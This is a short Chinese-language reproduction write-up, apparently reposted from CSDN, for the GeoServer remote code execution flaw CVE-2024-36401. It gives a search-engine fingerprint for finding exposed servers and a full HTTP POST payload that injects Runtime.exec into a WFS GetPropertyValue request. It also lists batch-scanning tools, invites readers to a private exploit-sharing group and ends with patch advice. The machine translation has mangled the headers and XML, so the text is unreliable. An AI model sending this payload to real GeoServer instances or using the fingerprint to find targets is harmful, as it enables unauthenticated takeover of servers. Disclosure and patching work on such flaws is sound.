0x01 产品简介
GeoServer 是一个用于共享、处理和编辑地理空间数据的开源服务器。对多种地图和数据标准的支持允许用户通过网络访问和操作地理信息系统(GIS)数据。
0x02 漏洞概述
2024年7月,互联网上披露了一个Geoserver风格的注入远程代码执行漏洞(CVE-2024-36401)。攻击者可以利用此漏洞无需身份验证即可获取服务器权限。我们鼓励受影响的客户尽快修复此漏洞。可能的。
0x03 搜索引擎
应用程序=\’地理服务器\’
0x04 漏洞复现
POST /geoserver/wfs HTTP/1.1
Host:你的IP
User-Agent: Mozilla/5.0(Windows NT 10.0;Win64;x64) AppleWebKit/537.36(KHTML、Gecko 等) Chrome/124.0.6367.118 Safari/537.36
Accept-Encoding: gzip、deflate、br
接受: */*
接受语言: en-US;q=0.9,en;q=0.8
内容类型: 应用程序/xml
关闭连接:
wfs:GetPropertyValue 服务=\’WFS\’ 版本=\’2.0.0\’
xmlns:topp=\’http://www.openplans.org/topp\’
xmlns:fes=\’http://www.opengis.net/fes/2.0\’
xmlns:wfs=\’http://www.opengis.net/wfs/2.0\’
wfs:Query typeNames=\’topp:states\’/
wfs:valueReferenceexec(java.lang.Runtime.getRuntime(),\’执行命令\’)/wfs:valueReference
/wfs:获取属性值
0x05 工具批量
nuclei
afrog
xray
POC脚本获取
使用VX扫描并加入我们内部的POC脚本共享圈。
0x06 修复建议
先前版本的官方补丁已发布可供下载(https://geoserver.org/),其中包含修复的gt-app-schema、gt-complex 和gt-xsd-core jar 文件。可以从GeoServer 版本2.25.1、2.24.3、2.24.2、2.23.2、2.21.5、2.20.7、2.20.4、2.19.2 和2.18.0 的发行页面下载补丁。下载后,使用补丁文件替换原文件。
#【漏洞复现】上述Geoserver XPath表达式注入远程代码执行漏洞相关内容来源于互联网,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93323.html